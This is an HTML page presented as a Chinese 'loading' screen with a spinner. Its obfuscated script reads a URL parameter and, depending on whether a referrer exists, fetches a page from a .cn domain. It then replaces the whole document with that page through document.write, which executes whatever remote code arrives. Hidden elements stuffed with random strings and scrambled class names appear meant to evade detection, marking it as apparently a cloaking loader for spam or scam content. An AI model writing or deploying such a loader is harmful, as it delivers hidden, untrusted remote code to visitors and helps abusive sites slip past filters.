<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Or1pZ0qlr9V {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Or1pZ0qlr9V .nAP9F3J {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Or1pZ0qlr9V .content {
            line-height: 50px;
            text-align: center
        }

        .Or1pZ0qlr9V .img {
            width: 100%
        }

        .Or1pZ0qlr9V .lhWVU65i {
            text-align: center
        }

        .Or1pZ0qlr9V .lhWVU65i span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Or1pZ0qlr9V .lhWVU65i span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Or1pZ0qlr9V .lhWVU65i span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Or1pZ0qlr9V .lhWVU65i span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Or1pZ0qlr9V .lhWVU65i span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Or1pZ0qlr9V .lhWVU65i span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Or1pZ0qlr9V .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HnQSpzOFJI(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Ot7Pze = HnQSpzOFJI('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Ot7Pze +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Ot7Pze +".html?a=share";
		}
		
        heUDOwPB=url+"#"+new Date().getTime();
        heUDOwPB && function() {
            $.get(heUDOwPB, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >FxSYoPbvALRueRa5Y</h1>
<a  href='#' style='display:none'>r2mFwTcqzyVRSC069m2feJEIHhuogVleos76C3LIUrq9bIXFG0EStg3FQ</a>
<li style='display:none' >GeJKpd5v3M99sAgImYXfYsrxO</li>
<b style='display:none' >UOYxIt1ZtrsxrI0xyDgMfyBNvifhn</b><div class="Or1pZ0qlr9V">
    <div class="nAP9F3J">
        <div class="lhWVU65i">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>oJcE8doOK0Bx5WNi80BbeZ59MNurquanX0IG3EDL8MvogShZ7JISbpwmZKkLbx90O</span>
<ul style='display:none' >nxK76DiWqGYSBt3CmNTmqQyMoKhvk7NUjBOkixOtNq4D3vsq2hiALcEmasc8wx1wb7oplocTHaJCq1IDNb6YJhtfs</ul>
<div style='display:none'>luoDPraRttcNPvHXGWzFTiy4oJxMHF6RLyP0s2GUxvNnOSPIFSQGEP1bz24Z2tM1xrxg</div>
<li style='display:none' >UaMptsNdY01M5UzTQKrJQoenhgyyOIaAFgogJpr1Pa11foSZPmav8XHBBuWIXGrwRchLvwqbFo4vUTOe0BjQmvy2ZoJoAJ</li>
<li style='display:none' >UaMptsNdY01M5UzTQKrJQoenhgyyOIaAFgogJpr1Pa11foSZPmav8XHBBuWIXGrwRchLvwqbFo4vUTOe0BjQmvy2ZoJoAJ</li>
<h1 style='display:none' >SpM81mqVWbeie8K1q1uXSS7APxH2NOlGJJknwwZCkN86jq3z0vS5kpCGVlhs8f9ZXqqKwcOufufHjd1syx</h1>
<a  href='#' style='display:none'>Ypol8XDR84Tec0VrkONgNlS71HtwAZGxnj4Lxy0OrweKje0UDxcfE9F2ZzJrS</a>
<li style='display:none' >UaMptsNdY01M5UzTQKrJQoenhgyyOIaAFgogJpr1Pa11foSZPmav8XHBBuWIXGrwRchLvwqbFo4vUTOe0BjQmvy2ZoJoAJ</li>
<div style='display:none'>luoDPraRttcNPvHXGWzFTiy4oJxMHF6RLyP0s2GUxvNnOSPIFSQGEP1bz24Z2tM1xrxg</div>
<b style='display:none' >s3OU4DfGLQ8ohmL56cz6azbSgswQNBTkvV6YqENEjOj35GEnxmg3cqJzzSJj1YZcvl0b0WAnodmAurImT5ZV7WRaz5s4gHN</b></body>
</html>